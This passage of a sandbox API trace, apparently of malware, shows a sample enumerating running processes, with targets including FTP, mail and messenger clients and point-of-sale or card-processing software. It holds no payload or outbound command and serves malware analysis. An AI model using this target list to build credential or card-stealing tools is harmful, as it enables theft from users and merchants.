lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0220.037] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0220.053] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0220.056] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0220.058] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0220.060] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0220.067] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0220.069] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0220.070] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0220.072] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0220.074] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0220.076] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0220.079] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0220.083] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0220.087] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0220.090] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0220.093] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0220.096] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0220.100] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0220.102] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0220.105] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0220.111] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0220.114] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0220.117] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0220.120] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0220.126] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0220.260] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0220.263] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0220.265] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0220.268] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0220.270] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0220.274] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0220.276] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0220.278] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0220.280] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0220.283] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0220.286] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0220.288] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0220.290] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0220.333] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0220.336] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0220.338] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0220.340] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0220.342] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0220.345] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0220.347] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0220.349] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0220.351] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0220.352] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0220.354] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0220.356] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0220.358] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0220.362] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0220.364] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0220.367] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0220.369] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0220.411] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0220.413] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0220.415] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0220.417] CloseHandle (hObject=0x21c8) returned 1 [0220.417] Sleep (dwMilliseconds=0x64) [0220.541] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21c8 [0220.557] Process32First (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0220.561] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0220.563] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0220.566] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0220.568] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0220.571] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0220.574] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0220.576] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0220.615] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0220.619] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.622] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.625] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0220.627] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.632] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.635] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.639] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.641] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.644] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x49, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.666] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.670] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0220.673] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0220.678] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0220.682] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0220.685] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.687] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0220.690] Process32Next (in: 